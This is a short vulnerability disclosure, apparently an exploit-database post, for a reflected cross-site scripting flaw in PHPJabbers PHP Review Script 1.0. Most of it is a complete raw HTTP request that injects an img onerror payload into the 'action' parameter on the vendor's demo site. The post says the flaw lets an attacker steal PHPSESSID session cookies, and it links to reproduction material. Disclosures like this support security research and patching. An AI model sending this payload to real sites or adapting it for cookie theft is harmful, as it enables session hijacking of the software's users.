## Title: PHPJABBERS-PHP Review Script-1.0 XSS-Reflected ## Author: nu11secur1ty ## Date: 08/31/2023 ## Vendor: https://www.phpjabbers.com/ ## Software: https://www.phpjabbers.com/php-review-script/ ## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected ## Description: The value of the `action` request parameter is copied into the HTML document as plain text between tags. The payload aelllnx0ib was submitted in the action parameter. This input was echoed unmodified in the application's response. The attacker can steal a PHPSESSID cookie! STATUS: HIGH Vulnerability [+]Exploit: ```GET GET /1693484209_401/hipark-residence.php?controller=pjLoad&action=pjActionPostaelll%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3enx0ib HTTP/1.1 Host: demo.phpjabbers.com Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: _ga=GA1.2.221094441.1693486538; _gid=GA1.2.1044601458.1693486538; _gat=1; _fbp=fb.1.1693486538348.177361623; _ga_NME5VTTGTT=GS1.2.1693486538.1.1.1693486541.57.0.0 Upgrade-Insecure-Requests: 1 Referer: http://demo.phpjabbers.com/1693484209_401/hipark-residence.php?controller=pjLoad&action=pjActionIndex&pjPage=1 Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Content-Length: 0 ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Review-Script-1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/08/phpjabbers-php-review-script-10-xss.html) ## Time spend: 01:05:00